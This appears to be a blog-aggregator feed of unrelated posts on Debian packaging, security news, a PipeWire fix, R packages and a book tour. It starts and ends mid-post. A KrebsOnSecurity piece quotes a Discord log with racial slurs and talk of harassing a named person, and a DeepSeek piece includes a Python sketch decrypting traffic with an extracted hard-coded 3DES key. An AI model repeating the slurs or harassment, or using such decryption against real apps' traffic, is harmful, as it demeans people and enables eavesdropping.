upstream five years ago. A handful of crash bugs had been reported
against the Debian package, and looking at the upstream repository I
even found a few crash bugs reported there too. To add insult to
injury, I discovered that upstream had accumulated several fixes in the
years between 2010 and now, and many of them had not made their way
into the Debian package. I decided enough was enough, and that a new
upstream release was needed to fix these nasty crash bugs. Luckily I
am also a member of the Xiph team, aka upstream, and could actually go
to work immediately to fix it.
I started by adding automatic build testing on
the oggz repository on the Xiph gitlab instance, to get a better idea of the state of affairs with the
code base. This exposed a few build problems, which I had to fix. In
parallel to this, I sent an email announcing my wish for a new release
to every person who had committed to the upstream code base since
2010, and asked for help doing a new release both on email and on the
#xiph IRC channel. Sadly only a fraction of their email providers
accepted my email. But Ralph Giles in the Xiph team came to the rescue and provided invaluable help to guide me through the Xiph release process. While this was going on, I spent a few days tracking
down the crash bugs with good help from
valgrind, and came up with
patch proposals to get rid of at least these specific crash bugs. The
open issues also had to be checked. Several of them proved to be
fixed already, but a few I had to create patches for. I also checked
out the Debian, Arch, Fedora, Suse and Gentoo packages to see if there
were patches applied in these Linux distributions that should be
passed upstream. The end result was ready yesterday. A new liboggz
release, version 1.1.2, was tagged, wrapped up and published on the
project page. And today, the new release was uploaded into
Debian.
You are probably by now curious about what actually changed in the
library. I guess the most interesting new feature was support for
Opus and VP8. Almost all other changes were stability or
documentation fixes. The rest were related to the gitlab continuous
integration testing. All in all, this was really a minor update,
hence the version bump only from 1.1.1 to 1.1.2, but it was long
overdue and I am very happy that it is out the door.
One change proposed upstream was not included this time, as it
extended the API and changed some of the existing library methods, and
thus would require a major SONAME bump and possibly code changes in every
program using the library. As I am not that familiar with the code
base, I am unsure if I am the right person to evaluate the change.
Perhaps later.
Since the release was tagged, a few minor fixes have been committed upstream already: automatic testing of cross-building to Windows, and documentation updates linking to the correct project page. If an important issue is discovered with this release, I guess a new release might happen soon including the minor fixes. If not, perhaps they can
wait fifteen years. :)
I would like to send a big thank you to everyone that helped make
this release happen, from the people adding fixes upstream over the
course of fifteen years, to the ones reporting crash bugs, other bugs
and those maintaining the package in various Linux distributions.
Thank you very much for your time and interest.
As usual, if you use Bitcoin and want to show your support of my
activities, please send Bitcoin donations to my address
15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.
This was my hundred-twenty-seventh month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on:
[DLA 4014-1] gnuchess security update to fix one CVE related to arbitrary code execution via crafted PGN (Portable Game Notation) data.
[DLA 4015-1] rsync update to fix five CVEs related to leaking information from the server or writing files outside of the client’s intended destination.
[DLA 4015-2] rsync update to fix an upstream regression.
[DLA 4039-1] ffmpeg update to fix three CVEs related to possible integer overflows, double-free on
errors and out-of-bounds access.
As new CVEs for ffmpeg appeared, I started working on another update of this package.
Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.
Debian ELTS
This month was the seventy-eighth ELTS month. During my allocated time I uploaded or worked on:
[ELA-1290-1] rsync update to fix five CVEs in Buster, Stretch and Jessie related to leaking information from the server or writing files outside of the client’s intended destination.
[ELA-1290-2] rsync update to fix an upstream regression.
[ELA-1313-1] ffmpeg update to fix six CVEs in Buster related to possible integer overflows, double-free on errors and out-of-bounds access.
[ELA-1314-1] ffmpeg update to fix six CVEs in Stretch related to possible integer overflows, double-free on errors and out-of-bounds access.
As new CVEs for ffmpeg appeared, I started working on another update of this package.
Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting.
Debian Printing
This month I uploaded new packages or new upstream or bugfix versions of:
… brlaser new upstream release (in new upstream repository)
Debian Astro
This month I uploaded new packages or new upstream or bugfix versions of:
… calceph sponsored upload of new upstream version
… libxisf sponsored upload of new upstream version
Patrick, our Outreachy intern for the Debian Astro project, is doing very well and deals with task after task. He is working on automatic updates of the indi 3rd-party drivers and maybe the results of his work will already be part of Trixie.
Debian IoT
Unfortunately I didn’t find any time to work on this topic.
Debian Mobcom
This month I uploaded new packages or new upstream or bugfix versions of:
The Washington Post is reporting that the UK government has served Apple with a “technical capability notice” as defined by the 2016 Investigatory Powers Act, requiring it to break the Advanced Data Protection encryption in iCloud for the benefit of law enforcement.
This is a big deal, and something we in the security community have worried was coming for a while now.
The law, known by critics as the Snoopers’ Charter, makes it a criminal offense to reveal that the government has even made such a demand. An Apple spokesman declined to comment.
Apple can appeal the U.K. capability notice to a secret technical panel, which would consider arguments about the expense of the requirement, and to a judge who would weigh whether the request was in proportion to the government’s needs. But the law does not permit Apple to delay complying during an appeal.
In March, when the company was on notice that such a requirement might be coming, it told Parliament: “There is no reason why the U.K. [government] should have the authority to decide for citizens of the world whether they can avail themselves of the proven security benefits that flow from end-to-end encryption.”
Apple is likely to turn the feature off for UK users rather than break it for everyone worldwide. Of course, UK users will be able to spoof their location. But this might not be enough. According to the law, Apple would not be able to offer the feature to anyone who is in the UK at any point: for example, a visitor from the US.
And what happens next? Australia has a law enabling it to ask for the same thing. Will it? Will even more countries follow?
Author: Mark Renney The rumours began some twelve months ago or so and the idea quickly took hold that there was an unseen presence under the Dome, a ghost haunting the Fields of Research. These murmurings were persistent and frequent with everyone telling the same tale, describing how they had felt something or, more accurately, […]
Wired reported this week that a 19-year-old working for Elon Musk‘s so-called Department of Government Efficiency (DOGE) was given access to sensitive US government systems even though his past association with cybercrime communities should have precluded him from gaining the necessary security clearances to do so. As today’s story explores, the DOGE teen is a former denizen of ‘The Com,’ an archipelago of Discord and Telegram chat channels that function as a kind of distributed cybercriminal social network for facilitating instant collaboration.
Since President Trump’s second inauguration, Musk’s DOGE team has gained access to a truly staggering amount of personal and sensitive data on American citizens, moving quickly to seize control over databases at the U.S. Treasury, the Office of Personnel Management, the Department of Education, and the Department of Health and Human Services, among others.
Wired first reported on Feb. 2 that one of the technologists on Musk’s crew is a 19-year-old high school graduate named Edward Coristine, who reportedly goes by the nickname “Big Balls” online. One of the companies Coristine founded, Tesla.Sexy LLC, was set up in 2021, when he would have been around 16 years old.
“Tesla.Sexy LLC controls dozens of web domains, including at least two Russian-registered domains,” Wired reported. “One of those domains, which is still active, offers a service called Helfie, which is an AI bot for Discord servers targeting the Russian market. While the operation of a Russian website would not violate US sanctions preventing Americans doing business with Russian companies, it could potentially be a factor in a security clearance review.”
Mr. Coristine has not responded to requests for comment. In a follow-up story this week, Wired found that someone using a Telegram handle tied to Coristine solicited a DDoS-for-hire service in 2022, and that he worked for a short time at a company that specializes in protecting customers from DDoS attacks.
A profile photo from Coristine’s WhatsApp account.
Internet routing records show that Coristine runs an Internet service provider called Packetware (AS400495). Also known as “DiamondCDN,” Packetware currently hosts tesla[.]sexy and diamondcdn[.]com, among other domains.
DiamondCDN was advertised and claimed by someone who used the nickname “Rivage” on several Com-based Discord channels over the years. A review of chat logs from some of those channels show other members frequently referred to Rivage as “Edward.”
From late 2020 to late 2024, Rivage’s conversations would show up in multiple Com chat servers that are closely monitored by security companies. In November 2022, Rivage could be seen requesting recommendations for a reliable and powerful DDoS-for-hire service.
Rivage made that request in the cybercrime channel “Dstat,” a core Com hub where users could buy and sell attack services. Dstat’s website dstat[.]cc was seized in 2024 as part of “Operation PowerOFF,” an international law enforcement action against DDoS services.
Coristine’s LinkedIn profile said that in 2022 he worked at an anti-DDoS company called Path Networks, which Wired generously described as a “network monitoring firm known for hiring reformed blackhat hackers.” Wired wrote:
“At Path Network, Coristine worked as a systems engineer from April to June of 2022, according to his now-deleted LinkedIn résumé. Path has at times listed as employees Eric Taylor, also known as Cosmo the God, a well-known former cybercriminal and member of the hacker group UGNazis, as well as Matthew Flannery, an Australian convicted hacker whom police allege was a member of the hacker group LulzSec. It’s unclear whether Coristine worked at Path concurrently with those hackers, and WIRED found no evidence that either Coristine or other Path employees engaged in illegal activity while at the company.”
The founder of Path is a young man named Marshal Webb. I wrote about Webb back in 2016, in a story about a DDoS defense company he co-founded called BackConnect Security LLC. On September 20, 2016, KrebsOnSecurity published data showing that the company had a history of hijacking Internet address space that belonged to others.
The other founder of BackConnect Security LLC was Tucker Preston, a Georgia man who pleaded guilty in 2020 to paying a DDoS-for-hire service to launch attacks against others.
The aforementioned Path employee Eric Taylor pleaded guilty in 2017 to charges including an attack on our home in 2013. Taylor was among several men involved in making a false report to my local police department about a supposed hostage situation at our residence in Virginia. In response, a heavily-armed police force surrounded my home and put me in handcuffs at gunpoint before the police realized it was all a dangerous hoax known as “swatting.”
CosmoTheGod rocketed to Internet infamy in 2013 when he and a number of other hackers set up the Web site exposed[dot]su, which “doxed” dozens of public officials and celebrities by publishing the address, Social Security numbers and other personal information on the former First Lady Michelle Obama, the then-director of the FBI and the U.S. attorney general, among others. The group also swatted many of the people they doxed.
Wired noted that Coristine only worked at Path for a few months in 2022, but the story didn’t mention why his tenure was so short. A screenshot shared on the website pathtruths.com includes a snippet of conversations in June 2022 between Path employees discussing Coristine’s firing.
According to that record, Path founder Marshal Webb dismissed Coristine for leaking internal documents to a competitor. Not long after Coristine’s termination, someone leaked an abundance of internal Path documents and conversations. Among other things, those chats revealed that one of Path’s technicians was a Canadian man named Curtis Gervais who was convicted in 2017 of perpetrating dozens of swatting attacks and fake bomb threats — including at least two attempts against our home in 2014.
A snippet of text from an internal Path chat room, wherein members discuss the reason for Coristine’s termination: Allegedly, leaking internal company information. Source: Pathtruths.com.
On May 11, 2024, Rivage posted on a Discord channel for a DDoS protection service that is chiefly marketed to members of The Com. Rivage expressed frustration with his time spent on Com-based communities, suggesting that its profitability had been oversold.
“I don’t think there’s a lot of money to be made in the com,” Rivage lamented. “I’m not buying Heztner [servers] to set up some com VPN.”
Rivage largely stopped posting messages on Com channels after that. Wired reports that Coristine subsequently spent three months last summer working at Neuralink, Elon Musk’s brain implant startup.
The trouble with all this is that even if someone sincerely intends to exit The Com after years of consorting with cybercriminals, they are often still subject to personal attacks, harassment and hacking long after they have left the scene.
That’s because a huge part of Com culture involves harassing, swatting and hacking other members of the community. These internecine attacks are often for financial gain, but just as frequently they are perpetrated by cybercrime groups to exact retribution from or assert dominance over rival gangs.
Experts say it is extremely difficult for former members of violent street gangs to gain a security clearance needed to view sensitive or classified information held by the U.S. government. That’s because ex-gang members are highly susceptible to extortion and coercion from current members of the same gang, and that alone presents an unacceptable security risk for intelligence agencies.
And make no mistake: The Com is the English-language cybercriminal hacking equivalent of a violent street gang. KrebsOnSecurity has published numerous stories detailing how feuds within the community periodically spill over into real-world violence.
When Coristine’s name surfaced in Wired‘s report this week, members of The Com immediately took notice. In the following segment from a February 5, 2025 chat in a Com-affiliated hosting provider, members criticized Rivage’s skills, and discussed harassing his family and notifying authorities about incriminating accusations that may or may not be true.
2025-02-05 16:29:44 UTC vperked#0 they got this nigga on indiatimes man
2025-02-05 16:29:46 UTC alexaloo#0 Their cropping is worse than AI could have done
2025-02-05 16:29:48 UTC hebeatsme#0 bro who is that
2025-02-05 16:29:53 UTC hebeatsme#0 yalla re talking about
2025-02-05 16:29:56 UTC xewdy#0 edward
2025-02-05 16:29:56 UTC .yarrb#0 rivagew
2025-02-05 16:29:57 UTC vperked#0 Rivarge
2025-02-05 16:29:57 UTC xewdy#0 diamondcdm
2025-02-05 16:29:59 UTC vperked#0 i cant spell it
2025-02-05 16:30:00 UTC hebeatsme#0 rivage
2025-02-05 16:30:08 UTC .yarrb#0 yes
2025-02-05 16:30:14 UTC hebeatsme#0 i have him added
2025-02-05 16:30:20 UTC hebeatsme#0 hes on discord still
2025-02-05 16:30:47 UTC .yarrb#0 hes focused on stroking zaddy elon
2025-02-05 16:30:47 UTC vperked#0 https://en.wikipedia.org/wiki/Edward_Coristine
2025-02-05 16:30:50 UTC vperked#0 no fucking way
2025-02-05 16:30:53 UTC vperked#0 they even made a wiki for him
2025-02-05 16:30:55 UTC vperked#0 LOOOL
2025-02-05 16:31:05 UTC hebeatsme#0 no way
2025-02-05 16:31:08 UTC hebeatsme#0 hes not a good dev either
2025-02-05 16:31:14 UTC hebeatsme#0 like????
2025-02-05 16:31:22 UTC hebeatsme#0 has to be fake
2025-02-05 16:31:24 UTC xewdy#0 and theyre saying ts
2025-02-05 16:31:29 UTC xewdy#0 like ok bro
2025-02-05 16:31:51 UTC .yarrb#0 now i wanna know what all the other devs are like…
2025-02-05 16:32:00 UTC vperked#0 “`Coristine used the moniker “bigballs” on LinkedIn and @Edwardbigballer on Twitter, according to The Daily Dot.[“`
2025-02-05 16:32:05 UTC vperked#0 LOL
2025-02-05 16:32:06 UTC hebeatsme#0 lmfaooo
2025-02-05 16:32:07 UTC vperked#0 bro
2025-02-05 16:32:10 UTC hebeatsme#0 bro
2025-02-05 16:32:17 UTC hebeatsme#0 has to be fake right
2025-02-05 16:32:22 UTC .yarrb#0 does it mention Rivage?
2025-02-05 16:32:23 UTC xewdy#0 He previously worked for NeuraLink, a brain computer interface company led by Elon Musk
2025-02-05 16:32:26 UTC xewdy#0 bro what
2025-02-05 16:32:27 UTC alexaloo#0 I think your current occupation gives you a good insight of what probably goes on
2025-02-05 16:32:29 UTC hebeatsme#0 bullshit man
2025-02-05 16:32:33 UTC xewdy#0 this nigga got hella secrets
2025-02-05 16:32:37 UTC hebeatsme#0 rivage couldnt print hello world
2025-02-05 16:32:42 UTC hebeatsme#0 if his life was on the line
2025-02-05 16:32:50 UTC xewdy#0 nigga worked for neuralink
2025-02-05 16:32:54 UTC hebeatsme#0 bullshit
2025-02-05 16:33:06 UTC Nashville Dispatch ##0000 ||@PD Ping||
2025-02-05 16:33:07 UTC hebeatsme#0 must have killed all those test pigs with some bugs
2025-02-05 16:33:24 UTC hebeatsme#0 ur telling me the rivage who failed to start a company
2025-02-05 16:33:28 UTC hebeatsme#0 https://cdn.camp
2025-02-05 16:33:32 UTC hebeatsme#0 who didnt pay for servers
2025-02-05 16:33:34 UTC hebeatsme#0 ?
2025-02-05 16:33:42 UTC hebeatsme#0 was too cheap
2025-02-05 16:33:44 UTC vperked#0 yes
2025-02-05 16:33:50 UTC hebeatsme#0 like??
2025-02-05 16:33:53 UTC hebeatsme#0 it aint adding up
2025-02-05 16:33:56 UTC alexaloo#0 He just needed to find his calling idiot.
2025-02-05 16:33:58 UTC alexaloo#0 He found it.
2025-02-05 16:33:59 UTC hebeatsme#0 bro
2025-02-05 16:34:01 UTC alexaloo#0 Cope in a river dude
2025-02-05 16:34:04 UTC hebeatsme#0 he cant make good money right
2025-02-05 16:34:08 UTC hebeatsme#0 doge is about efficiency
2025-02-05 16:34:11 UTC hebeatsme#0 he should make $1/he
2025-02-05 16:34:15 UTC hebeatsme#0 $1/hr
2025-02-05 16:34:25 UTC hebeatsme#0 and be whipped for better code
2025-02-05 16:34:26 UTC vperked#0 prolly makes more than us
2025-02-05 16:34:35 UTC vperked#0 with his dad too
2025-02-05 16:34:52 UTC hebeatsme#0 time to report him for fraud
2025-02-05 16:34:54 UTC hebeatsme#0 to donald trump
2025-02-05 16:35:04 UTC hebeatsme#0 rivage participated in sim swap hacks in 2018
2025-02-05 16:35:08 UTC hebeatsme#0 put that on his wiki
2025-02-05 16:35:10 UTC hebeatsme#0 thanks
2025-02-05 16:35:15 UTC hebeatsme#0 and in 2021
2025-02-05 16:35:17 UTC hebeatsme#0 thanks
2025-02-05 16:35:19 UTC chainofcommand#0 i dont think they’ll care tbh
Given the speed with which Musk’s DOGE team was allowed access to such critical government databases, it strains credulity that Coristine could have been properly cleared beforehand. After all, he’d recently been dismissed from a job for allegedly leaking internal company information to outsiders.
According to the national security adjudication guidelines (PDF) released by the Director of National Intelligence (DNI), eligibility determinations take into account a person’s stability, trustworthiness, reliability, discretion, character, honesty, judgment, and ability to protect classified information.
The DNI policy further states that “eligibility for covered individuals shall be granted only when facts and circumstances indicate that eligibility is clearly consistent with the national security interests of the United States, and any doubt shall be resolved in favor of national security.”
On Thursday, 25-year-old DOGE staff member Marko Elez resigned after being linked to a deleted social media account that advocated racism and eugenics. Elez resigned after The Wall Street Journal asked the White House about his connection to the account.
“Just for the record, I was racist before it was cool,” the account posted in July. “You could not pay me to marry outside of my ethnicity,” the account wrote on X in September. “Normalize Indian hate,” the account wrote the same month, in reference to a post noting the prevalence of people from India in Silicon Valley.
Elez’s resignation came a day after the Department of Justice agreed to limit the number of DOGE employees who have access to federal payment systems. The DOJ said access would be limited to two people, Elez and Tom Krause, the CEO of a company called Cloud Software Group.
Earlier today, Musk said he planned to rehire Elez after President Trump and Vice President JD Vance reportedly endorsed the idea. Speaking at The White House today, Trump said he wasn’t concerned about the security of personal information and other data accessed by DOGE, adding that he was “very proud of the job that this group of young people” are doing.
A White House official told Reuters on Wednesday that Musk and his engineers have appropriate security clearances and are operating in “full compliance with federal law, appropriate security clearances, and as employees of the relevant agencies, not as outside advisors or entities.”
NPR reports Trump added that his administration’s cost-cutting efforts would soon turn to the Education Department and the Pentagon, “where he suggested without evidence that there could be ‘trillions’ of dollars in wasted spending within the $6.75 trillion the federal government spent in fiscal year 2024.”
GOP leaders in the Republican-controlled House and Senate have largely shrugged about Musk’s ongoing efforts to seize control over federal databases, dismantle agencies mandated by Congress, freeze federal spending on a range of already-appropriated government programs, and threaten workers with layoffs.
Meanwhile, multiple parties have sued to stop DOGE’s activities. ABC News says a federal judge was to rule today on whether DOGE should be blocked from accessing Department of Labor records, following a lawsuit alleging Musk’s team sought to illegally access highly sensitive data, including medical information, from the federal government.
At least 13 state attorneys general say they plan to file a lawsuit to stop DOGE from accessing federal payment systems containing Americans’ sensitive personal information, reports The Associated Press.
Reuters reported Thursday that the U.S. Treasury Department had agreed not to give Musk’s team access to its payment systems while a judge is hearing arguments in a lawsuit by employee unions and retirees alleging Musk illegally searched those records.
Ars Technica writes that the Department of Education (DoE) was sued Friday by a California student association demanding an “immediate stop” to DOGE’s “unlawfully” digging through student loan data to potentially dismantle the DoE.
For whatever reason, when I plug and unplug my wireless headset dongle over USB,
it is not always detected by the PulseAudio/PipeWire stack that handles
desktop sound on Linux these days. But we can fix that with a restart
of the handling daemon, see below.
In PulseAudio terminology an input device (microphone) is called a source, and
an output device a sink.
When the headset dongle is plugged in, we can see it on the USB bus:
$ lsusb | grep Headset
Bus 001 Device 094: ID 046d:0af7 Logitech, Inc. Logitech G PRO X 2 Gaming Headset
The device is detected correctly as a Human Interface Device (HID):
$ dmesg
...
[310230.507591] input: Logitech Logitech G PRO X 2 Gaming Headset as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.1/1-1.1.4/1-1.1.4:1.3/0003:046D:0AF7.0060/input/input163
[310230.507762] hid-generic 0003:046D:0AF7.0060: input,hiddev2,hidraw11: USB HID v1.10 Device [Logitech Logitech G PRO X 2 Gaming Headset] on usb-0000:00:14.0-1.1.4/input
However it is not seen in the list of sources / sinks of PulseAudio:
This unfriendly list shows my docking station, which has a small jack connector
for a wired cable, the built-in speaker of my laptop, and a Bluetooth headset.
If I restart Pipewire,
$ systemctl --user restart pipewire
then the headset appears as possible audio output.
Then test some recording; you will hear the output around one second after
speaking (yes, that is recorded audio sent over a Unix pipe for playback!):
# don't do this when the output is a speaker, this will create audio feedback (larsen effect)
$ arecord -f cd - | aplay
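If this happens often, the check-and-restart can be scripted. A rough sketch in Python (untested; the "Headset" match string is an assumption based on the lsusb and sink names above):
import subprocess

def output_contains(cmd, needle):
    # run a command and check whether its output mentions the headset
    out = subprocess.run(cmd, capture_output=True, text=True).stdout
    return needle in out

# dongle present on the USB bus but missing from the PipeWire/PulseAudio sinks?
if output_contains(["lsusb"], "Headset") and not output_contains(["pactl", "list", "short", "sinks"], "Headset"):
    subprocess.run(["systemctl", "--user", "restart", "pipewire"], check=True)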
Kaspersky is reporting on a new type of smartphone malware.
The malware in question uses optical character recognition (OCR) to review a device’s photo library, seeking screenshots of recovery phrases for crypto wallets. Based on their assessment, infected Google Play apps have been downloaded more than 242,000 times. Kaspersky says: “This is the first known case of an app infected with OCR spyware being found in Apple’s official app marketplace.”
The still very new package zigg which
arrived on CRAN a week ago just
received a micro-update at CRAN. zigg provides
the Ziggurat
pseudo-random number generator (PRNG) for Normal, Exponential and
Uniform draws proposed by Marsaglia and
Tsang (JSS, 2000),
and extended by Leong et al. (JSS, 2005). This PRNG
is lightweight and very fast: on my machine speedups for the
Normal, Exponential, and Uniform are on the order of 7.4, 5.2 and 4.7
times faster than the default generators in R as illustrated in the benchmark
chart borrowed from the git repo.
As I wrote last week in the initial
announcement, I had picked up their work in package RcppZiggurat
and updated its code for the 64-bit world we now live in. That package
already provided the Normal generator along with several competing
implementations which it compared rigorously and timed. As one of
the generators was based on the GNU GSL via the
implementation of Voss, we always ended
up with a run-time dependency on the GSL too. No more: this new package
is zero-dependency, zero-suggests and hence very easy to deploy.
Moreover, we also include a demonstration of four distinct ways of
accessing the compiled code from another R package: pure and straight-up
C, similarly pure C++, inclusion of the header in C++ as well as via Rcpp. The other advance is the
resurrection of the second generator for the Exponential distribution.
And following Burkardt we expose the
Uniform too. The main upside of these generators is their excellent
speed, as can be seen in the comparison against the default R generators
generated by the example script timings.R:
Needless to say, speed is not everything. This PRNG comes from the time of
32-bit computing, so the generator period is likely to be shorter than
that of newer high-quality generators. If in doubt, forgo speed and
stick with the high-quality default generators.
This release essentially just completes the DESCRIPTION file and
README.md now that this is a CRAN package. The short NEWS entry
follows.
Changes in version 0.0.2
(2025-02-07)
Complete DESCRIPTION and README.md following initial CRAN
upload
I have a feeling we're going to be seeing a lot of AI WTFerry at this site for a while, and fewer stupid online sales copy booboos. For today, here we go:
Jet-setter
Stewart
wants to sell a pound, but he's going to have to cover some ground first.
"Looks like Google are trying very hard to encourage me to stop using their search engine. Perhaps they want me to use chatGPT? I just can't fathom how it got this so wrong."
Tim R.
proves that AIs aren't immune to the general flubstitution error category either.
"I'm not quite sure what's going on here - there were 5 categories each with the same [insert content here] placeholder. Maybe the outer text is not AI generated and the developers forgot to actually call the AI, or maybe the AI has been trained on so much placeholder source code it thought it was generating what I wanted to see."
"Crazy Comcast Calendar Corruption!" complains
B.J.H.
"No wonder I didn't get birthday gifts -- my birth month
has been sloughed away. But they still charged me for the months that don't exist." Hey, they only charged you for 12 months at least. Maybe they just picked twelve at random.
Educator
Manuel H.
"Publishing a session recording in [open-source] BigBlueButton seems to be a task for logicians: Should it be public, or protected, or both? Or should it rather be published instead of public? Or better not published at all?"
A little translation explanation: the list of options provided would in English be "Public/Protected, Public, Protected, Published, Unpublished". I have no idea what the differences mean.
And the pièce de résistance from
Mark Whybird
"I've always hated click here as a UX antipattern, but Dell have managed to make it even worse." Or maybe better? This is hysterical.
Author: Deborah Sale-Butler It was a great place to live. Tons of space to spin out a web. And the local food was spectacular. I mean, you could get anything in that neighborhood: dragonflies, blowflies, sometimes even a big, fat, juicy moth. De-lish! I can honestly say, up until Tuesday I was an arachnid with […]
New mobile apps from the Chinese artificial intelligence (AI) company DeepSeek have remained among the top three “free” downloads for Apple and Google devices since their debut on Jan. 25, 2025. But experts caution that many of DeepSeek’s design choices — such as using hard-coded encryption keys, and sending unencrypted user and device data to Chinese companies — introduce a number of glaring security and privacy risks.
Public interest in the DeepSeek AI chat apps swelled following widespread media reports that the upstart Chinese AI firm had managed to match the abilities of cutting-edge chatbots while using a fraction of the specialized computer chips that leading AI companies rely on. As of this writing, DeepSeek is the third most-downloaded “free” app on the Apple store, and #1 on Google Play.
DeepSeek’s rapid rise caught the attention of the mobile security firm NowSecure, a Chicago-based company that helps clients screen mobile apps for security and privacy threats. In a teardown of the DeepSeek app published today, NowSecure urged organizations to remove the DeepSeek iOS mobile app from their environments, citing security concerns.
NowSecure founder Andrew Hoog said they haven’t yet concluded an in-depth analysis of the DeepSeek app for Android devices, but that there is little reason to believe its basic design would be functionally much different.
Hoog told KrebsOnSecurity there were a number of qualities about the DeepSeek iOS app that suggest the presence of deep-seated security and privacy risks. For starters, he said, the app collects an awful lot of data about the user’s device.
“They are doing some very interesting things that are on the edge of advanced device fingerprinting,” Hoog said, noting that one property of the app tracks the device’s name — which for many iOS devices defaults to the customer’s name followed by the type of iOS device.
The device information shared, combined with the user’s Internet address and data gathered from mobile advertising companies, could be used to deanonymize users of the DeepSeek iOS app, NowSecure warned. The report notes that DeepSeek communicates with Volcengine, a cloud platform developed by ByteDance (the makers of TikTok), although NowSecure said it wasn’t clear if the data is just leveraging ByteDance’s digital transformation cloud service or if the declared information share extends further between the two companies.
Image: NowSecure.
Perhaps more concerning, NowSecure said the iOS app transmits device information “in the clear,” without any encryption to encapsulate the data. This means the data being handled by the app could be intercepted, read, and even modified by anyone who has access to any of the networks that carry the app’s traffic.
“The DeepSeek iOS app globally disables App Transport Security (ATS) which is an iOS platform level protection that prevents sensitive data from being sent over unencrypted channels,” the report observed. “Since this protection is disabled, the app can (and does) send unencrypted data over the internet.”
Hoog said the app does selectively encrypt portions of the responses coming from DeepSeek servers. But they also found it uses an insecure and now deprecated encryption algorithm called 3DES (aka Triple DES), and that the developers had hard-coded the encryption key. That means the cryptographic key needed to decipher those data fields can be extracted from the app itself.
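To illustrate why a hard-coded key is fatal here: once the key has been pulled out of the app binary, anyone who captures the traffic can decrypt it. A minimal sketch in Python using the pycryptodome package (the key, IV and payload below are made up, not DeepSeek's):
from Crypto.Cipher import DES3
from Crypto.Util.Padding import pad, unpad

HARDCODED_KEY = b"0123456789abcdefABCDEFGH"  # 24-byte 3DES key baked into the app (hypothetical)
STATIC_IV = b"\x00" * 8                      # a fixed IV makes matters even worse

def app_encrypt(data):
    # what an app like this does before sending selected fields
    return DES3.new(HARDCODED_KEY, DES3.MODE_CBC, iv=STATIC_IV).encrypt(pad(data, 8))

def eavesdropper_decrypt(blob):
    # anyone holding the extracted key can reverse it
    return unpad(DES3.new(HARDCODED_KEY, DES3.MODE_CBC, iv=STATIC_IV).decrypt(blob), 8)

captured = app_encrypt(b"device_name=...&user_id=...")
print(eavesdropper_decrypt(captured))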
There were other, less alarming security and privacy issues highlighted in the report, but Hoog said he’s confident there are additional, unseen security concerns lurking within the app’s code.
“When we see people exhibit really simplistic coding errors, as you dig deeper there are usually a lot more issues,” Hoog said. “There is virtually no priority around security or privacy. Whether cultural, or mandated by China, or a witting choice, taken together they point to significant lapse in security and privacy controls, and that puts companies at risk.”
Apparently, plenty of others share this view. Axios reported on January 30 that U.S. congressional offices are being warned not to use the app.
“[T]hreat actors are already exploiting DeepSeek to deliver malicious software and infect devices,” read the notice from the chief administrative officer for the House of Representatives. “To mitigate these risks, the House has taken security measures to restrict DeepSeek’s functionality on all House-issued devices.”
TechCrunch reports that Italy and Taiwan have already moved to ban DeepSeek over security concerns. Bloomberg writes that the Pentagon has blocked access to DeepSeek. CNBC says NASA also banned employees from using the service, as did the U.S. Navy.
Beyond security concerns tied to the DeepSeek iOS app, there are indications the Chinese AI company may be playing fast and loose with the data that it collects from and about users. On January 29, researchers at Wiz said they discovered a publicly accessible database linked to DeepSeek that exposed “a significant volume of chat history, backend data and sensitive information, including log streams, API secrets, and operational details.”
“More critically, the exposure allowed for full database control and potential privilege escalation within the DeepSeek environment, without any authentication or defense mechanism to the outside world,” Wiz wrote. [Full disclosure: Wiz is currently an advertiser on this website.]
KrebsOnSecurity sought comment on the report from DeepSeek and from Apple. This story will be updated with any substantive replies.
Announcing the Picks and Shovels book tour (permalink)
My next novel, Picks and Shovels, is officially out in the US and Canada on Feb 17, and I’m about to leave on a 20+ city book-tour, which means there’s a nonzero chance I’ll be in a city near you between now and the end of the spring!
Picks and Shovels is a standalone novel starring Martin Hench – my hard-charging, two-fisted, high-tech forensic accountant – in his very first adventure, in the early 1980s. It’s a story about the Weird PC era, when no one was really certain what shape PCs should be, who should make them, who should buy them, and what they’re for. It features a commercial war between two very different PC companies.
The first one, Fidelity Computing, is a predatory multi-level marketing faith scam, run by a Mormon bishop, a Catholic priest, and an orthodox rabbi. Fidelity recruits people to exploit members of their faith communities by selling them third-rate PCs that are designed as rip-off lock-ins, forcing you to buy special floppies for their drives, special paper for their printers, and to use software that is incompatible with everything else in the world.
The second PC company is Computing Freedom, a rebel alliance of three former Fidelity Computing sales-managers: an orthodox woman who’s been rejected by her family after coming out as queer; a Mormon woman who’s rejected the Church over its opposition to the Equal Rights Amendment, and a nun who’s quit her order to join the Liberation Theology movement in the struggle for human rights in America’s dirty wars.
In the middle of it all is Martin Hench, coming of age in San Francisco during the PC bubble, going to Dead Kennedys shows, getting radicalized by ACT UP!, and falling in love – all while serving as CFO and consigliere to Computing Freedom, as a trade war turns into a shooting war, and they have to flee for their lives.
The book’s had fantastic early reviews, with endorsements from computer historians like Steven Levy (Hackers), Claire Evans (Broad-Band), John Markoff (What the Dormouse Said) and Dan’l Lewin (CEO of the Computer History Museum). Stephen Fry raved that he “hugely enjoyed” the “note perfect,” “superb” story.
And I’m about to leave on tour! I have nineteen confirmed dates, and two nearly confirmed dates, and there’s more to come! I hope you’ll consider joining me at one of these events. I’ve got a bunch of fantastic conversation partners joining me onstage and online, and the bookstores that are hosting me are some of my favorite indie booksellers in the world.
VIRTUAL (Feb 15):
YANIS VAROUFAKIS, sponsored by Jacobin and hosted by David Moscrop, 10AM Pacific, 1PM Eastern, 6PM UK, 7PM CET https://www.youtube.com/watch?v=xkIDep7Z4LM
PDX, Jun 20 (TBC):
Powell’s Books (date and time to be confirmed)
I’m also finalizing plans for one or two dates in NEW ZEALAND at the end of April, as well as an ATLANTA date, likely on March 26.
I really hope you’ll come out and say hello. I know these are tough times. Hanging out with nice people who care about the same stuff as you is a genuine tonic.
Armadillo is a powerful
and expressive C++ template library for linear algebra and scientific
computing. It aims towards a good balance between speed and ease of use,
has a syntax deliberately close to Matlab, and is useful for algorithm
development directly in C++, or quick conversion of research code into
production environments. RcppArmadillo
integrates this library with the R environment and language–and is
widely used by (currently) 1215 other packages on CRAN, downloaded 38.2 million
times (per the partial logs from the cloud mirrors of CRAN), and the CSDA paper (preprint
